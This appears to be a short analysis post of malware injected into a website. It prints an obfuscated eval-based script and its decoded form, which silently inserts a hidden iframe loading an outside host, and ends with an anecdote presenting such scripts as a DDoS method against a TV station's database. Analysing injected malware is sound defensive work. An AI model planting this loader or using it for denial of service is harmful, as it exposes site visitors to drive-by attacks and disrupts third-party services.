injected malware on zeldman.com/dwws/

obfuscated.js

i=0;try{grbregd=prototype;}catch(z){h="harCode";f=[-36.5,-36.5,11.5,10,-25,-21,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,10.5,9.5,17,-6.5,13,9.5,13.5,9.5,14,17,16.5,-8,19.5,1,7.5,10.5,-2,7.5,13.5,9.5,-21,-21.5,8,14.5,9,19.5,-21.5,-20.5,4.5,-17,5.5,-20.5,20.5,-34.5,-36.5,-36.5,-36.5,11.5,10,16,7.5,13.5,9.5,16,-21,-20.5,-11.5,-34.5,-36.5,-36.5,21.5,-25,9.5,13,16.5,9.5,-25,20.5,-34.5,-36.5,-36.5,-36.5,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,18.5,16,11.5,17,9.5,-21,-24,-11,11.5,10,16,7.5,13.5,9.5,-25,16.5,16,8.5,-10.5,-21.5,11,17,17,15,-12,-17.5,-17.5,10,7.5,19.5,9,15,13,16.5,15,13,-18,10,11.5,14,9,11,9.5,16,9.5,-18,14.5,16,10.5,-17.5,-9.5,10.5,14.5,-10.5,-16,-21.5,-25,18.5,11.5,9,17,11,-10.5,-21.5,-16.5,-17,-21.5,-25,11,9.5,11.5,10.5,11,17,-10.5,-21.5,-16.5,-17,-21.5,-25,16.5,17,19.5,13,9.5,-10.5,-21.5,18,11.5,16.5,11.5,8,11.5,13,11.5,17,19.5,-12,11,11.5,9,9,9.5,14,-11.5,15,14.5,16.5,11.5,17,11.5,14.5,14,-12,7.5,8,16.5,14.5,13,17.5,17,9.5,-11.5,13,9.5,10,17,-12,-17,-11.5,17,14.5,15,-12,-17,-11.5,-21.5,-10,-11,-17.5,11.5,10,16,7.5,13.5,9.5,-10,-24,-20.5,-11.5,-34.5,-36.5,-36.5,21.5,-34.5,-36.5,-36.5,10,17.5,14,8.5,17,11.5,14.5,14,-25,11.5,10,16,7.5,13.5,9.5,16,-21,-20.5,20.5,-34.5,-36.5,-36.5,-36.5,18,7.5,16,-25,10,-25,-10.5,-25,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,8.5,16,9.5,7.5,17,9.5,-6.5,13,9.5,13.5,9.5,14,17,-21,-21.5,11.5,10,16,7.5,13.5,9.5,-21.5,-20.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,16.5,16,8.5,-21.5,-19,-21.5,11,17,17,15,-12,-17.5,-17.5,10,7.5,19.5,9,15,13,16.5,15,13,-18,10,11.5,14,9,11,9.5,16,9.5,-18,14.5,16,10.5,-17.5,-9.5,10.5,14.5,-10.5,-16,-21.5,-20.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,18,11.5,16.5,11.5,8,11.5,13,11.5,17,19.5,-10.5,-21.5,11,11.5,9,9,9.5,14,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,15,14.5,16.5,11.5,17,11.5,14.5,14,-10.5,-21.5,7.5,8,16.5,14.5,13,17.5,17,9.5,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,13,9.5,10,17,-10.5,-21.5,-17,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,17,14.5,15,-10.5,-21.5,-17,-21.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,18.5,11.5,9,17,11,-21.5,-19,-21.5,-16.5,-17,-21.5,-20.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,11,9.5,11.5,10.5,11,17,-21.5,-19,-21.5,-16.5,-17,-21.5,-20.5,-11.5,-34.5,-36.5,-36.5,-36.5,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,10.5,9.5,17,-6.5,13,9.5,13.5,9.5,14,17,16.5,-8,19.5,1,7.5,10.5,-2,7.5,13.5,9.5,-21,-21.5,8,14.5,9,19.5,-21.5,-20.5,4.5,-17,5.5,-18,7.5,15,15,9.5,14,9,-7.5,11,11.5,13,9,-21,10,-20.5,-11.5,-34.5,-36.5,-36.5,21.5];v="e"+"va";}if(v)e=window[v+"l"];try{q=document["crea"+"teEle"+"ment"]("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?h:"");for(;579!=i;i+=1){j=i;if(e)s=s+r["fr"+"omC"+((e)?z:12)]((w[j]*1+41)*2);} if(v&&e&&r&&z&&h&&s&&f&&v&&v&&e&&r&&h)try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}

unobfuscated.js

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://faydplspl.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://faydplspl.findhere.org/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

in college we "accidentally" took down our local TV station's oracle database by spamming their vote-for-your-favorite-ACC-basketball-team webpage like this; our intent was to fake a lot of browser requests that would appear to be genuine (aside from the referer being wrong). it may not be the best DDOS method, but it will work.